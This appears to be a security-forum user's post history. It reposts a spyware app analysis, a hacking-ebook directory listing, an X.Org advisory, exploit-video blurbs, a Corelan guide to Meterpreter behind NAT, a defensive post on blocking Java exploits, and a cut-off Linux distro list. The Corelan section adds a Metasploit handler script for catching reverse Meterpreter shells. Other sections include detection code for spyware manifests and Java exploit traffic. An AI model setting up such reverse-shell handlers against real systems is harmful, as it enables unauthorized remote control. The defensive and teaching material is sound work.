Everything posted by Nytro
-
Want to Spy? Google Play will help you

Spyware or legitimate monitoring application? You decide. In this blog we'll discuss a 'legitimate' app that can be purchased in Google Play, known as SMS Tracker. It is legitimate in the sense that it advertises exactly what it does, but based on how this same application is packaged and distributed in other markets, it's clear that the vendor is also targeting another, less altruistic audience with the same application. The app also illustrates the powerful access permissions that an application can gain so long as the end user agrees to them, either explicitly or otherwise.

Details about the application:
Name: SMS Tracker
Installs: 10,000-15,000
Description: Gizmoquip SMS Tracker - Track text messages and location data from all of your android phones.

As per the description on the application's Google Play page, the application is able to do the following:
- SMS Tracking – Intercepts text messages. Read all inbound and outbound text messages. Details include time and date, phone number, contact name and location of the target phone. Complete text message tracking and logging.
- MMS tracking – Intercepts MMS multimedia messages. Read and view all inbound and outbound MMS messages. See what photos are sent to and from the target phone. Details include photo, time and date, phone number, contact name and location of the target phone.
- Browser Tracking – Monitors all web browser activity on the target phone. Know which websites were visited, which pages were viewed and when.
- GPS Tracking – Logs GPS location information which can later be viewed on a map. Know when and where the phone was located at all times. Breadcrumbs record location information, allowing parents to locate their children at frequent intervals. GPS logging occurs at a user-defined rate (default interval is 5 minutes). Remote GPS logging and viewing give you the ability to see the location of your child's phone from any web browser. The breadcrumb trail offers powerful GPS tracking.
- Call Logging – Monitors all inbound, outbound and missed calls. Identifies the phone number, contact name, call duration, and location of the phone for every call.
- If you want to know where your kids are, just send them a text message. The location of the phone is recorded every time it sends or receives a text message.
- Tracking of system events, including device powered on/off, device attached to / removed from the charger, apps installed/removed/updated.
- Silently monitor all inbound and outbound SMS messages.

How can the app be used? First you download the application and install it on the device you want to spy on. After installing the application you need to register it. Next, you go to the Gizmoquip SMS Tracker web site, where you will be asked for the login name and password that were registered when the application was installed. [Screenshot: the dashboard after login.] [Screenshot: the page where you can see the logging from the device. It covers SMS, device information, call logs, network traffic, location details, etc.]

Zscaler's concerns: In any other context, an application with these capabilities would clearly be labelled as spyware. At the vendor's site (Gizmoquip.com - Download) they are selling a repackaged version of this app which has the same functionality but does not leave an icon on the device, thus making it more stealthy and harder to detect following installation. This version also does not contain the notification icon or the privacy policy screen. Why the lack of transparency? What audience is this version targeting? This same application could also serve as a generic template for other spyware projects by being wrapped with other code, providing the core functionality needed to create another malicious app.

This type of app clearly shows the powerful level of access that can be granted to Android apps, so long as users grant permission. An app can access SMS, call logs, network traffic, hardware details, screen details, etc. Always carefully read the permissions requested by an application before installing it on your device. The vendor is promoting this application as a tool for monitoring the mobile activities of your children. However, this same app would be a very effective tool for spying on someone once installed on their phone. You just need to install the app on the device you want to spy on and you are done. All the information about the device and all call and SMS logs can then be remotely monitored. Moreover, all of the user's private data is stored on the vendor's server. What guarantees are in place that the private data will remain private? In the increasingly common enterprise world of "Bring Your Own Device" (BYOD), such applications could be leveraged to expose corporate contact lists, email and browsing information, and to collect private data from corporate apps in the workplace. Enterprises often block access to 'non-official' app stores to prevent the installation of such apps, but this illustrates that such a restriction is no guarantee that spyware can't be installed from an official source.

VirusTotal scan results:
The application available from the vendor site (smstracker.com): https://www.virustotal.com/en/file/21aa6c6652287413f07ddfbcadea84441a500ee12816dfe4beed913e4a0fa636/analysis/
The Google Play store's version: https://www.virustotal.com/en/file/a3b40fa9fea9600b55d4d07fd4f0358ee74e6924c342c5857c2a5311f7a11ed3/analysis/
Interestingly, despite virtually the same functionality, far fewer AV vendors flag the Google Play version as malicious.

- Viral

Source: Zscaler Research: Want to Spy? Google Play will help you
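A quick way to spot the two things the post calls out (a surveillance-grade permission set that ships data over the network, and a repackaged build with no launcher icon) is to run the decoded AndroidManifest.xml through a small checker. The script below is an added example, not Zscaler's code and not taken from SMS Tracker; the two manifests embedded in it are constructed, the package names are hypothetical, and the permission list and the threshold of three surveillance permissions are assumptions you would tune for your own environment.

```python
"""Flag spyware-style permission sets and a missing launcher icon in a decoded
AndroidManifest.xml (e.g. one extracted with apktool). Added example; the two
manifests below are constructed, not real apps."""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Permissions that, together with INTERNET, give the SMS/MMS/call/location/web
# surveillance described in the post plus a way to ship the data off the device.
SURVEILLANCE_PERMS = {
    "android.permission.READ_SMS",
    "android.permission.RECEIVE_SMS",
    "android.permission.RECEIVE_MMS",
    "android.permission.READ_CALL_LOG",
    "android.permission.READ_CONTACTS",
    "android.permission.ACCESS_FINE_LOCATION",
    "com.android.browser.permission.READ_HISTORY_BOOKMARKS",
}
EXFIL_PERM = "android.permission.INTERNET"
BOOT_PERM = "android.permission.RECEIVE_BOOT_COMPLETED"


def _a(el, name):
    """Read an android:-namespaced attribute."""
    return el.get("{%s}%s" % (ANDROID_NS, name))


def permissions(root):
    return {_a(p, "name") for p in root.iter("uses-permission")}


def has_launcher_activity(root):
    """No MAIN/LAUNCHER activity means no icon in the app drawer: exactly the
    'stealthy' repackaging the post describes."""
    for activity in root.iter("activity"):
        for flt in activity.iter("intent-filter"):
            actions = {_a(x, "name") for x in flt.iter("action")}
            cats = {_a(x, "name") for x in flt.iter("category")}
            if ("android.intent.action.MAIN" in actions
                    and "android.intent.category.LAUNCHER" in cats):
                return True
    return False


def analyze(manifest_xml, threshold=3):
    """Return a list of findings; an empty list means nothing suspicious."""
    root = ET.fromstring(manifest_xml)
    perms = permissions(root)
    spy = sorted(perms & SURVEILLANCE_PERMS)
    findings = []
    if len(spy) >= threshold and EXFIL_PERM in perms:
        findings.append("surveillance permissions + INTERNET: "
                        + ", ".join(p.rsplit(".", 1)[1] for p in spy))
    if BOOT_PERM in perms:
        findings.append("restarts at boot (RECEIVE_BOOT_COMPLETED)")
    if not has_launcher_activity(root):
        findings.append("no MAIN/LAUNCHER activity: app shows no icon")
    return findings


# Constructed manifests with hypothetical package names.
STEALTH_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.tracker">
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.READ_CALL_LOG"/>
  <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <application>
    <service android:name=".LogService"/>
    <receiver android:name=".BootReceiver"/>
  </application>
</manifest>"""

BENIGN_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.notes">
  <uses-permission android:name="android.permission.INTERNET"/>
  <application>
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
  </application>
</manifest>"""

if __name__ == "__main__":
    for name, xml in (("stealth", STEALTH_MANIFEST), ("benign", BENIGN_MANIFEST)):
        print(name, analyze(xml) or ["clean"])
```

The launcher check is the interesting one for this post: the Google Play build shows an icon, the vendor-site build does not, and that difference is visible in the manifest before the app is ever run.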
-
Parent Directory -
Ebooks by Authors/ 02-Jul-2011 20:33 -
Syngress - Aggressive Network Self-Defense.pdf 02-Jul-2011 20:33 83M
Syngress - Best Damn Windows Server 2003 Book P..> 02-Jul-2011 20:34 21M
Syngress - Botnets - The Killer Web App.pdf 02-Jul-2011 20:34 7.0M
Syngress - Buffer Overflow Attacks.pdf 02-Jul-2011 20:34 5.4M
Syngress - Building DMZs for Enterprise Network..> 02-Jul-2011 20:34 12M
Syngress - Building SANs with Brocade Fabric Sw..> 02-Jul-2011 20:35 3.8M
Syngress - Building a VoIP Network with Multime..> 02-Jul-2011 20:34 17M
Syngress - C#.NET Web Developer's Guide.pdf 02-Jul-2011 20:34 6.8M
Syngress - Check Point NG VPN-1 FireWall-1 Adva..> 02-Jul-2011 20:33 12M
Syngress - Cisco Security - Professional's Guid..> 02-Jul-2011 20:33 15M
Syngress - Cisco Security - Specialist's Guide ..> 02-Jul-2011 20:33 11M
Syngress - Combating Spyware in the Enterprise.pdf 02-Jul-2011 20:34 8.0M
Syngress - Creating Security Policies and Imple..> 02-Jul-2011 20:33 2.8M
Syngress - Cyber Adversary Characterization - A..> 02-Jul-2011 20:33 4.1M
Syngress - Cyber Crime Investigations.pdf 02-Jul-2011 20:33 9.2M
Syngress - Cyber Spying - Tracking your Family'..> 02-Jul-2011 20:35 106M
Syngress - Developer's Guide to Web Application..> 02-Jul-2011 20:33 11M
Syngress - Email Virus Protection Handbook.pdf 02-Jul-2011 20:32 5.8M
Syngress - Enemy at the Water Cooler.pdf 02-Jul-2011 20:33 6.3M
Syngress - Essential Computer Security.pdf 02-Jul-2011 20:33 7.8M
Syngress - Google Hacking for Penetration Teste..> 02-Jul-2011 20:34 13M
Syngress - Google Hacking for Penetration Teste..> 02-Jul-2011 20:33 15M
Syngress - Google Talking.pdf 02-Jul-2011 20:34 8.3M
Syngress - Hack Proofing Linux.pdf 02-Jul-2011 20:32 12M
Syngress - Hack Proofing Sun Solaris.pdf 02-Jul-2011 20:34 6.8M
Syngress - Hack Proofing Windows 2000 Server.pdf 02-Jul-2011 20:33 12M
Syngress - Hack Proofing XML.pdf 02-Jul-2011 20:34 7.1M
Syngress - Hack Proofing your Identity in the I..> 02-Jul-2011 20:33 8.9M
Syngress - Hack Proofing your Network - 2nd Edi..> 02-Jul-2011 20:34 8.8M
Syngress - Hack Proofing your Web Applications.pdf 02-Jul-2011 20:33 8.6M
Syngress - Hack Proofing your Wireless Network.pdf 02-Jul-2011 20:32 6.6M
Syngress - Hack Proofing your network.pdf 02-Jul-2011 20:34 2.9M
Syngress - Hack the Stack.pdf 02-Jul-2011 20:33 7.2M
Syngress - How to Cheat at Securing a Wireless ..> 02-Jul-2011 20:32 12M
Syngress - InfoSec Career Hacking - Sell your S..> 02-Jul-2011 20:34 84M
Syngress - Intrusion, Prevention and Active Res..> 02-Jul-2011 20:34 85M
Syngress - LEGO Software Power Tools.pdf 02-Jul-2011 20:34 15M
Syngress - Linksys WRT54G Ultimate Hacking.pdf 02-Jul-2011 20:32 16M
Syngress - Metasploit Toolkit for Penetration T..> 02-Jul-2011 20:34 4.9M
Syngress - Microsoft Vista for IT Security Prof..> 02-Jul-2011 20:34 19M
Syngress - Nessus Network Auditing.pdf 02-Jul-2011 20:33 4.6M
Syngress - Ninja Hacking - Unconventional Penet..> 02-Jul-2011 20:34 9.9M
Syngress - Nmap in the Enterprise - Your Guide ..> 02-Jul-2011 20:34 6.1M
Syngress - OS X for Hackers at Heart.pdf 02-Jul-2011 20:34 15M
Syngress - Penetration Tester's Open Source Too..> 02-Jul-2011 20:33 34M
Syngress - Penetration Tester's Open Source Too..> 02-Jul-2011 20:35 27M
Syngress - Phishing Exposed.pdf 02-Jul-2011 20:34 8.3M
Syngress - Practical VoIP Security.pdf 02-Jul-2011 20:33 9.7M
Syngress - Programmer's Ultimate Security Deskr..> 02-Jul-2011 20:33 4.5M
Syngress - RFID Security.pdf 02-Jul-2011 20:34 5.9M
Syngress - SQL Injection Attacks and Defense.pdf 02-Jul-2011 20:34 6.5M
Syngress - Scene of the Cybercrime - Computer F..> 02-Jul-2011 20:33 5.0M
Syngress - Scripting VMware Power Tools.pdf 02-Jul-2011 20:34 5.0M
Syngress - Secure Your Network for Free.pdf 02-Jul-2011 20:33 7.2M
Syngress - Securing the Cloud - Cloud Computer ..> 02-Jul-2011 20:34 3.3M
Syngress - Security+ Study Guide.pdf 02-Jul-2011 20:32 11M
Syngress - Security Assessment Case Studies for..> 02-Jul-2011 20:34 5.0M
Syngress - Security Log Management - Identifyin..> 02-Jul-2011 20:34 6.6M
Syngress - Security Sage's Guide to Hardening t..> 02-Jul-2011 20:32 11M
Syngress - Snort 2.0 Intrusion Detection.pdf 02-Jul-2011 20:34 7.1M
Syngress - Snort 2.1 Intrusion Detection - 2nd ..> 02-Jul-2011 20:33 12M
Syngress - Snort IDS and IPS Toolkit.pdf 02-Jul-2011 20:34 8.4M
Syngress - Sockets, Shellcode, Porting and Codi..> 02-Jul-2011 20:33 112M
Syngress - Special Ops - Host and Network Secur..> 02-Jul-2011 20:32 17M
Syngress - Stealing the Network - How to Own a ..> 02-Jul-2011 20:34 9.1M
Syngress - Stealing the Network - How to Own th..> 02-Jul-2011 20:33 4.6M
Syngress - Systems Security Certification Pract..> 02-Jul-2011 20:34 6.3M
Syngress - Techno Security's Guide to Managin..> 02-Jul-2011 20:34 16M
Syngress - The Mezonic Agenda - Hacking the Pre..> 02-Jul-2011 20:34 16M
Syngress - VB.NET Developer's Guide.pdf 02-Jul-2011 20:33 6.4M
Syngress - WarDriving and Wireless Penetration ..> 02-Jul-2011 20:33 21M
Syngress - Wireless Hacking - Projects for Wi-F..> 02-Jul-2011 20:34 18M
Syngress - Wireshark and Ethereal - Network Pro..> 02-Jul-2011 20:32 13M
Syngress - Writing Security Tools and Exploits.pdf 02-Jul-2011 20:35 11M
Syngress - XSS Attacks.pdf 02-Jul-2011 20:34 7.3M
Syngress - Zen and the Art of Information Secur..> 02-Jul-2011 20:34 5.2M
Syngress - Zero Day Exploit - Countdown to Dark..> 02-Jul-2011 20:32 3.7M
The Hackademy - Hors Serie 1.pdf 02-Jul-2011 20:35 12M
The Hackademy - Hors Serie 2.pdf 02-Jul-2011 20:32 36M
The Hackademy - Hors Serie 3.pdf 02-Jul-2011 20:34 14M
The Hackademy Prog - Apprendre à Programmer en..> 02-Jul-2011 20:32 14M
The Hackademy Prog - Apprendre à Programmer en..> 02-Jul-2011 20:34 34M
The Hackademy School - Hack Newbie.pdf 02-Jul-2011 20:35 3.5M
The Hackademy School - Hack Security Pro.pdf 02-Jul-2011 20:33 6.4M
The Hackademy School - Linux.pdf 02-Jul-2011 20:33 19M
The Hackademy School - Mini Guide Anonymat.pdf 02-Jul-2011 20:34 2.3M
The Hackademy School - Newbie - part 1.pdf 02-Jul-2011 20:33 10M
The Hackademy School - Newbie - part 2.pdf 02-Jul-2011 20:34 9.9M
The Hackademy School - Newbie - part 3.pdf 02-Jul-2011 20:33 11M
The Hackademy School - Newbie - part 4.pdf 02-Jul-2011 20:33 9.2M
The Hackademy School - Securite wifi.pdf 02-Jul-2011 20:34 1.3M
ZI Hackademy - Newbie 1.pdf 02-Jul-2011 20:33 25M
ZI Hackademy - Newbie 2.pdf 02-Jul-2011 20:32 41M
ZI Hackademy - Newbie 3.pdf 02-Jul-2011 20:34 31M

Source: http://n-pn.info/repo/HackBBS/HackBBS/Docs_HackAngel/
-
[h=1]Another X.Org Security Bug Found, Dates Back To 1991[/h]
Posted by Michael Larabel in X.Org on 07 January 2014 06:00 PM EST

Another X.Org Security Advisory had to be publicly issued today to make known a buffer overflow in an X.Org library that has been present in every X11 release since X11R5; the code was completed back in 1991. Back in October there was an X11 security advisory going back to 1993, and today's security issue is in code introduced in May of 1991. This advisory comes just days after X Server security was called a disaster, with what will amount to at least hundreds of open security issues found by a researcher.

The bug was found by running the cppcheck utility as a static analyzer over the code. The issue is a stack buffer overflow in the parsing of BDF font files in libXfont. It has been present for more than two decades and was easily spotted with static analysis of the code. When the buffer overflow in libXfont is triggered, it is possible for the bug to lead to an unprivileged user acquiring root access to the system. This bug has been found in every X Server release going back to X11R5 and was corrected with the new release of libXfont 1.4.6. More details on this latest security advisory can be found via the xorg-announce list.

Source: [Phoronix] Another X.Org Security Bug Found, Dates Back To 1991
-
Stop posting pictures of black_death, you're misleading people.
-
30c3 - Hacking As Artistic Practice

Description: !Mediengruppe Bitnik are contemporary artists. In their talk they will show two examples of their work, illustrating the translation of hacking from the computer field into an artistic practice. Bitnik will show how to hack the opera in ten easy steps and what happens when you send a parcel with a hidden live webcam to Julian Assange at the Ecuadorian Embassy in London. Using the strategies of hacking, !Mediengruppe Bitnik intervenes in settings with the aim of opening them up to re-evaluation and new perspectives.

«Opera Calling» was an artistic intervention into the cultural system of the Zurich Opera. From March 9th to May 26th 2007, audio bugs hidden in the auditorium transmitted the performances of the Zurich Opera to randomly selected telephone land-lines in the city of Zurich. In the proper style of a home-delivery service, anyone who picked up their telephone was able to listen to the ongoing opera performances for as long as s/he wanted through a live connection with the audio bug signal. The Zurich Opera launched a search for the bugs and in a first reaction threatened to take legal action if the transmissions were not stopped and the bugs not removed.

«Delivery for Mr. Assange» is a live mail art piece. In January 2013 !Mediengruppe Bitnik sent Wikileaks founder Julian Assange a parcel containing a camera. Julian Assange has been living at the center of a diplomatic crisis at the Ecuadorian embassy in London since June 2012. Through a hole in the parcel, the camera documented and live-tweeted its journey through the postal system, letting anyone online follow the parcel's status in real time. !Mediengruppe Bitnik regard this work as a SYSTEM_TEST. Would the parcel reach its intended destination? Or would it be removed from the postal system?

For more information please visit: https://events.ccc.de/congress/2013/wiki/Main_Page

Source: 30c3 - Hacking As Artistic Practice
-
To protect and infect - The militarization of the internet
Nytro replied to aelius's topic in Stiri securitate
I know, but it's something that has to be seen. -
To protect and infect - The militarization of the internet
Nytro replied to aelius's topic in Stiri securitate
Too bad people prefer some crappy series/porn/movie instead of watching something like this. -
Windows Exploitation (Structured Exception Handler Based Exploitation)

Description: This video demos a Structured Exception Handler (SEH) stack overflow exploit. It gives some basic idea about the SEH structure in the Windows operating system and explains the technique used to perform exploitation.

Source: Windows Exploitation (Structured Exception Handler Based Exploitation)
-
Metasploit Meterpreter and NAT
Published January 4, 2014 | By Corelan Team (corelanc0d3r)

Professional pentesters typically use a host that is connected directly to the internet, has a public IP address, and is not hindered by any firewalls or NAT devices to perform their audit. Hacking "naked" is considered to be the easiest way to perform a penetration test that involves getting shells back. Not everyone has the luxury of putting a box directly on the internet, and as the number of free public IP addresses continues to decrease, the need to use an audit box placed in a LAN, behind a router or firewall, will increase.

Putting an audit box behind a device that translates traffic from private to public addresses and vice versa has some consequences. Not only do you need to be sure that the NAT device won't "break" if you start a rather fast portscan, but since the host is in a private LAN, behind a router or firewall, it won't be reachable directly from the internet. Serving exploits and handling reverse, incoming shells can be problematic in this scenario.

In this small post, we'll look at how to correctly configure Meterpreter payloads and make them work when your audit box is behind a NAT device. We'll use a browser exploit to demonstrate how to get a working Meterpreter session, even if both the target and the Metasploit "attacker" box are behind NAT.

Article: https://www.corelan.be/index.php/2014/01/04/metasploit-meterpreter-and-nat/
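The detail that trips people up in the NAT setup is that the payload's LHOST and the handler's bind address are two different things: the target must connect to the router's public address, while the handler on the audit box can only bind to its private address. The resource script below is an added illustration of that split, not the Corelan post's own configuration; the addresses (203.0.113.10 for the public side, 192.168.1.50 for the audit box) and the choice of port 443 are placeholders, and it assumes the router forwards TCP 443 to 192.168.1.50:443.

```text
# handler.rc  (assumed file name; load with: msfconsole -r handler.rc)
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp

# LHOST/LPORT are baked into the payload: where the *target* connects back to,
# i.e. the NAT device's public address and the forwarded port.
set LHOST 203.0.113.10
set LPORT 443

# The handler itself runs on the audit box, which has no public address, so
# bind it to the private interface instead of LHOST.
set ReverseListenerBindAddress 192.168.1.50
set ReverseListenerBindPort 443

set ExitOnSession false
exploit -j
```

Before serving anything, confirm the forward from outside the LAN (for example by connecting to 203.0.113.10:443 from a host on the internet while the handler is up); if the handler logs no connection attempt, the port forward, not the payload, is the problem.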
-
Windows Exploitation (Simple Stack Overflow)

Description: This video demos a simple stack overflow exploit. It gives some basic idea about the application being exploited, some idea about the exploit, and shows how a debugger can be used to perform exploitation.

Source: Windows Exploitation (Simple Stack Overflow)
-
You've started the new year like a bunch of wimps, whining about every bit of crap.
-
From what I can tell, I'm set to "invisible".
-
Done. Next to "Mark forums as read", at the bottom.
-
I didn't understand. Should I put a "New posts" link next to "Mark forums as read"?
-
I've added "Mark forums as read" for you, check whether it works. I also added a "Send PM" link. Check it.
-
[h=3]Effective blocking of Java exploits in enterprise environments[/h]

[h=2]Preface[/h]
"Java everyday" was a joke about Java vulnerabilities, from the time when a new Java zero-day was seen almost every day. Recently, "Java 0-day spotted in the wild" is no longer in the headlines every week (see http://java-0day.com), but Java exploits are still the biggest concern regarding exploit kits and drive-by-download malware. In a recent Kaspersky report, they found that about 90% of the exploit kits were trying to infect the victim machine via Java.

[h=2]The "typical useless" recommendations[/h]
Okay, so we have a problem called Java in the browser, let's look for a solution! The two simplest "solutions" of all are:
- Update your Java.
- Remove Java from your browser.
Both solutions are non-solutions for enterprises. A hell of a lot of in-house-built applications still need old Java, e.g. 1.6.x, which has been end-of-life since February 2013.

The next recommended "solution" is: "Create separate browsers for Internet and intranet usage. The intranet-facing browser supports Java, the Internet-facing one does not." Although this sounds pretty effective, there are still a lot of problems with this approach. Now IT has to update two browsers instead of one. Users have to be trained, and in the web-security gateway (web proxy) one has to configure that this browser can go there but the other can't, etc. And there might still be Java applet based applications outside of the organization which have to be used by a bunch of people.

Next solution: "Use NoScript". LOL. Teach NoScript to 50000 users, and see how they learn "Allow all this page" first, and "Allow scripts globally" the next time.

Next solution: "Click-to-play". I think this is a good countermeasure, but from now on the exploit maker either needs an exploit to bypass the click-to-play, or needs to socially engineer the user to click, so this is not a bulletproof solution either.

[h=2]The solution[/h]
Okay, so far we have five totally useless recommendations. The next one seems pretty good at first sight: "White-list websites which need Java, and only allow Java to these sites." Let's dig deeper. How can we "white-list" sites? This is not supported by Java out of the box. In a decent web-security gateway one can create white-lists, but we have to define a condition for Java traffic. A common misconception is to say: let's identify Java traffic by the .class, .jar and .jnlp file extensions, and only allow Java for white-listed websites. Although this will block some exploits, it will not block all of them. Here is a screenshot from the very popular Neutrino exploit kit: this is the .jar exploit. As you can see, there is no extension at all in the HTTP request (e.g. .jar). But what about the MIME type in the response? It is video/quicktime… But it is the jar exploit, with a detection of 2/49 on VirusTotal. And, yes, I'm aware of the fact that VirusTotal statistics are useless and AV has other possibilities in the exploit chain to block the malware being dropped. Or not.

Two things can be flagged here as Java: the User-Agent and the MIME type in the request. I recommend checking for both. The User-Agent can be checked via regular expressions, and if one matches, flag it as a Java request.

[h=2]Payload delivery[/h]
Although not closely related to the exploit, the malware payload delivery is interesting as well. After successful exploitation, the exploit payload downloads the malware from the same site. In a normal web-security gateway, executables can be flagged and blocked for average users. Now look at the Neutrino exploit kit: no executable extension (e.g. .exe, .dll), the response MIME type is faked to audio/mpeg, and the malware itself is XOR encrypted with a 4-character key (I leave guessing the XOR key as an exercise to the reader). Even if the web-security gateway looks for file headers to identify executables, it won't find one. The malware is decrypted only on the victim, where the AV might or might not find it. Although the User-Agent here is Java again, be aware of the fact that at this stage the User-Agent can be faked by the exploit.

[h=2]Mobile devices[/h]
If we white-list sites on the web-security gateway and block any other traffic when we see a Java User-Agent or content type, we are good. Well, almost. As long as the client is in the enterprise… What you can do here is force mobile devices to use a VPN every time they are outside of the corporate network, and only connect them to the Internet through the corporate web-security gateway. I know this is still not a solution, but I can't think of anything better at the moment. Leave a comment if you have a solution for this.

Now the only remaining Java threat is that someone hacks one of the white-listed websites in a watering hole attack and serves the Java exploit from the same page. Not a likely attack, but possible for a real advanced threat.

[h=2]Conclusion[/h]
If you are a CISO (or hold an equivalent position), you should proactively block Java exploits. White-listing websites which require Java is not impossible. Not a lot of sites use Java applets nowadays anyway; I would say average users see Java applets more often in an exploit than on a legitimate site... You can flag Java traffic via a User-Agent regular expression, or the content type (in the request), or both. Special care needs to be taken with mobile devices, which leave the enterprise on a regular basis. Of course, you will need other protections too, because this is not a 100% solution. And if you are a plain home user, you can safely delete Java from your browser, or use a decent Internet Security Suite which can effectively block Java exploits.

Posted by Z at 1:30:00 PM

Source: Jump ESP, jump!: Effective blocking of Java exploits in enterprise environments
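Two pieces of the post lend themselves to a concrete check: the gateway decision ("Java client, not a whitelisted host, block") made on request headers rather than on extensions or response MIME types, and the payload stage, where the dropped executable is hidden by a short repeating XOR key that a known-plaintext guess on the PE header recovers at once. The script below is an added example, not code from the Jump ESP, jump! post; the User-Agent pattern follows the `Java/<version>` form the JRE sends, the request Content-Type list and the whitelist host are assumptions, and the HTTP requests and the PE-shaped blob are constructed rather than captured exploit-kit traffic.

```python
"""Gateway-side Java request flagging plus XOR-key recovery for the dropped EXE.
Added example; header samples and the PE blob are constructed."""
import re
import struct

# The JRE/plugin sends e.g. "Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_25".
JAVA_UA_RE = re.compile(r"\bJava/\d+\.\d+\.\d+(?:_\d+)?\b")
# Request Content-Types only a Java client would send (assumed list).
JAVA_CONTENT_TYPES = {
    "application/x-java-archive", "application/java-archive",
    "application/x-java-applet", "application/x-java-jnlp-file",
}
ALLOWED_JAVA_HOSTS = {"intranet.example.com"}     # hypothetical whitelist


def parse_request(raw):
    """Split a raw HTTP request into (method, path, lowercase-keyed headers)."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path = lines[0].split(" ")[:2]
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return method, path, headers


def is_java_request(headers):
    """Flag on the User-Agent or on the request Content-Type; either is enough."""
    ua = headers.get("user-agent", "")
    ctype = headers.get("content-type", "").split(";")[0].strip().lower()
    return bool(JAVA_UA_RE.search(ua)) or ctype in JAVA_CONTENT_TYPES


def decide(raw):
    """'allow' unless the client is Java and the host is not whitelisted.
    URL extension and *response* MIME type are deliberately ignored: the post
    shows the exploit kit omitting the former and faking the latter."""
    _, _, headers = parse_request(raw)
    host = headers.get("host", "").split(":")[0].lower()
    if not is_java_request(headers):
        return "allow"
    return "allow" if host in ALLOWED_JAVA_HOSTS else "block"


# --- payload stage: the dropped EXE is XORed with a short repeating key -------

def xor(data, key):
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def recover_xor_key(blob, keylen=4, known=b"MZ\x90\x00"):
    """Known-plaintext attack: a PE opens with the DOS header (4D 5A 90 00 for
    the usual MSVC-linked binary), so the first keylen ciphertext bytes XOR the
    header give the whole repeating key."""
    return bytes(c ^ p for c, p in zip(blob[:keylen], known))


def looks_like_pe(data):
    """Confirm the guess: e_lfanew at 0x3c must point at the 'PE\\0\\0' signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3c)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def fake_pe():
    """Minimal constructed PE-shaped blob: DOS header, e_lfanew=0x80, PE signature."""
    hdr = bytearray(b"MZ\x90\x00" + b"\x00" * (0x3c - 4))
    hdr += struct.pack("<I", 0x80)
    hdr += b"\x00" * (0x80 - len(hdr))
    hdr += b"PE\x00\x00\x4c\x01"             # signature + IMAGE_FILE_MACHINE_I386
    return bytes(hdr)


# Constructed requests: a Java client fetching an extensionless path from an
# unknown host, the same client hitting the intranet, and a plain browser.
JAVA_REQ = ("GET /abcd1234 HTTP/1.1\r\nHost: ek.example.net\r\n"
            "User-Agent: Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_25\r\n"
            "Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2\r\n\r\n")
INTRANET_REQ = JAVA_REQ.replace("ek.example.net", "intranet.example.com")
BROWSER_REQ = ("GET /index.html HTTP/1.1\r\nHost: ek.example.net\r\n"
               "User-Agent: Mozilla/5.0 (Windows NT 6.1) Firefox/26.0\r\n\r\n")

if __name__ == "__main__":
    for req in (JAVA_REQ, INTRANET_REQ, BROWSER_REQ):
        print(decide(req))
    enc = xor(fake_pe(), b"k3y!")            # what the gateway would see on the wire
    key = recover_xor_key(enc)
    print(key, looks_like_pe(xor(enc, key)))
```

The header-based decision is what survives the tricks the post shows (no extension, faked response MIME type); the XOR recovery is the gateway-side complement for the payload stage, where a header-only check on the response finds nothing because the executable has no recognisable header until it reaches the victim.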
-
The 2013 Top 7 Best Linux Distributions for You
Thursday, 14 March 2013 09:00, Katherine Noyes

Back in 2010 Linux.com published a list of the year's top Linux distributions, and the popularity of the topic made it an instant annual tradition. There have been several shifts and shakeups on the lists presented since then, of course, and, as you'll soon see, this year's offering holds true to that pattern. In fact, I think it's safe to say that the past year has seen so much upheaval in the desktop world, particularly where desktop environments are concerned, that 2013's list could come as a surprise to some.

Let me hasten to note that the evaluations made here are nothing if not subjective. There also is no such thing as the "one best" Linux distro for anything; in fact, much of the beauty of Linux is its diversity and the fact that it can be tweaked and customized for virtually any taste or purpose. The one best Linux for you, in other words, is the flavor you choose for your purpose and preference and then tweak until it feels just right.

Still, I think some Linux flavors stand out these days as leaders for particular use cases. I'm going to diverge a bit from past lists here when it comes to those categories, however. Specifically, where past lists have included the category "Best Linux LiveCD," I think that's become almost obsolete given not just the general shift to USBs (some PCs don't even come with CD drives anymore, in fact) but also the fact that most any Linux distro can be formatted into bootable form. On the other hand, with the arrival of Steam for Linux, I think this year has brought the need for a new category: Best Linux for Gaming. Read on, then, for a rundown of some of the best of what the Linux world has to offer.

Best Desktop Distribution
There are so many excellent contenders for desktop Linux this year that it's become a more difficult choice than ever, and that's really saying something. Canonical's Ubuntu has made great strides in advancing Linux's visibility in the public eye, of course, while Linux Mint and Fedora are both also very strong choices. Regarding Ubuntu, however, a number of issues have come up over the past year or so, including the inclusion of online shopping results in searches, an addition Richard Stallman and the EFF have called "spyware." At the same time, the upheaval caused by the introduction of mobile-inspired desktops such as Unity and GNOME 3 continues unabated, spurring the launch of more classically minded new desktops such as MATE and Cinnamon along with brand-new distros. For best desktop Linux distro, I have to go with Fuduntu, one of this new breed of up-and-comers. Originally based on Fedora but later forked, Fuduntu offers a classic GNOME 2 interface, developed for the desktop, not for mobile devices, and generally seems to get everything right. Besides delivering the classic desktop so many Linux users have made clear that they prefer, Fuduntu enjoys all the advantages of being a rolling release distribution, and its repository includes key packages such as Netflix and Steam. I've been using it for months now and haven't seen a single reason to switch.

Best Laptop Distribution
